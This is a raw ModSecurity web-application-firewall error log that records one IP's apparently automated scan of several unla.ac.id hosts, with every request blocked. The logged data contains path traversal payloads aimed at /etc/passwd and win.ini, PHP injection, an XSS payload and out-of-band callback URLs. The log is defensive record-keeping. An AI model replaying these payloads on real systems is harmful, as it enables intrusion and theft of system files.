[Tue Aug 29 11:42:46.540953 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAenGXkAAAAM"]
[Tue Aug 29 11:42:46.544312 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAdV7dgAAAAa"]
[Tue Aug 29 11:42:46.551602 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAcoNkcAAAAF"]
[Tue Aug 29 11:42:46.554468 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAcvBnQAAAAJ"]
[Tue Aug 29 11:42:46.559681 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAd232IAAAAI"]
[Tue Aug 29 11:42:47.397578 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAd5ntAAAAAm"]
[Tue Aug 29 11:42:47.399056 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAXNuW8AAAAg"]
[Tue Aug 29 11:42:47.402201 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAdlvc4AAAAl"]
[Tue Aug 29 11:42:47.404347 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAd@4AIAAAAs"]
[Tue Aug 29 11:42:47.409172 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAdftTwAAAAG"]
[Tue Aug 29 11:42:47.413185 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13R8Co-f0AAAeX1BkAAAAK"]
[Tue Aug 29 11:42:47.414313 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAdV7dwAAAAa"]
[Tue Aug 29 11:42:47.414571 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13R8Co-f0AAAd-Fz0AAAAt"]
[Tue Aug 29 11:42:47.417732 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAd232UAAAAI"]
[Tue Aug 29 11:42:48.385075 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAd@4AMAAAAs"]
[Tue Aug 29 11:42:48.387576 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAeYbyMAAAAB"]
[Tue Aug 29 11:42:48.391492 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAdUc28AAAAZ"]
[Tue Aug 29 11:42:48.409297 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdxUSYAAAAC"]
[Tue Aug 29 11:42:48.409691 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAbo-egAAAAi"]
[Tue Aug 29 11:42:48.412057 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAARpg2YAAAAU"]
[Tue Aug 29 11:42:48.421119 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdSZNoAAAAX"]
[Tue Aug 29 11:42:48.433594 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAd4ayYAAAAj"]
[Tue Aug 29 11:42:48.435238 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAdV7d4AAAAa"]
[Tue Aug 29 11:42:48.438145 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAdb7mMAAAAb"]
[Tue Aug 29 11:42:48.495381 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdUc3AAAAAZ"]
[Tue Aug 29 11:42:48.511727 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gtwsw8c7ps35w1.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAcvBnkAAAAJ"]
[Tue Aug 29 11:42:48.519126 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAd4aycAAAAj"]
[Tue Aug 29 11:42:48.524196 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gctzmtnu38f84r.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAeDirAAAAAx"]
[Tue Aug 29 11:42:48.534420 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAdUc3EAAAAZ"]
[Tue Aug 29 11:42:49.368172 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ScCo-f0AAAdUc3IAAAAZ"]
[Tue Aug 29 11:42:49.385897 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13ScCo-f0AAAeChYEAAAAw"]
[Tue Aug 29 11:42:49.400543 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13ScCo-f0AAAeZ54wAAAAN"]
[Tue Aug 29 11:42:50.369650 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAeZ540AAAAN"]
[Tue Aug 29 11:42:50.369715 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdV7eEAAAAa"]
[Tue Aug 29 11:42:50.379299 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAd@4AgAAAAs"]
[Tue Aug 29 11:42:50.379614 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SsCo-f0AAAeChYIAAAAw"]
